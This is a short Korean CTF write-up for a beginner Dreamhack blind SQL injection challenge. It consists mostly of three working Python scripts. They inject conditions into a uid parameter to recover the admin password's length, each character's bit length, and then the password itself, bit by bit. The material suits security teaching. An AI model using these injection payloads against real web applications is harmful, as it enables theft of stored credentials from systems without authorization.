[WARGAME] Dreamhack - blind sql injection

1레벨의 간단한 문제이다.

 

from requests import get   


password_length = 0
while True:
    password_length += 1
    query = f"and char_length(upw) = {password_length}-- -"
    r = get(f"http://host3.dreamhack.games:11328/?uid=admin'{query}")
    print(r.text)
    if "exist" in r.text:
        break

print(f"passwordlength = {password_length}")

블라인드 sql 인젝션은 그 특수성때문에 password를 바로 찾아낼수 없다.

따라서 첫번째로, password 길이를 알아낸다.

 

길이는 13자리가 나온다.

from requests import get   
host = 'http://host3.dreamhack.games:11328/'

password_length = 13
for i in range(1, password_length + 1):
    bit_length = 0
    while True:
        bit_length += 1
        query = f"admin' and length(bin(ord(substr(upw, {i}, 1)))) = {bit_length}-- -"
        r = get(f"{host}/?uid={query}")
        if "exists" in r.text:
            break
    print(f"character {i}'s bit length: {bit_length}")

password의 길이를 이용해서 패스워드를 binary화 시킴 -> order로 i에 해당하는 자리를 탐색해서 1~13자리의 모든 비트 길이를 알아낸다.

 

알아낸 비트의 모든 크기를 비트로 출력한다.

각 비트별로 출력한 다음 비트를 변환하여 플래그로 출력한다,

 

from requests import get   
host = 'http://host3.dreamhack.games:11328/'

password_length = 13
password = ""
for i in range(1, password_length + 1):
    bit_length = 0
    while True:
        bit_length += 1
        query = f"admin' and length(bin(ord(substr(upw, {i}, 1)))) = {bit_length}-- -"
        r = get(f"{host}/?uid={query}")
        if "exists" in r.text:
            break
    print(f"character {i}'s bit length: {bit_length}")
    
    bits = ""
    for j in range(1, bit_length + 1):
        query = f"admin' and substr(bin(ord(substr(upw, {i}, 1))), {j}, 1) = '1'-- -"
        r = get(f"{host}/?uid={query}")
        if "exists" in r.text:
            bits += "1"
        else:
            bits += "0"
    print(f"character {i}'s bits: {bits}")


    password += int.to_bytes(int(bits, 2), (bit_length + 7) // 8, "big").decode("utf-8")
print(password)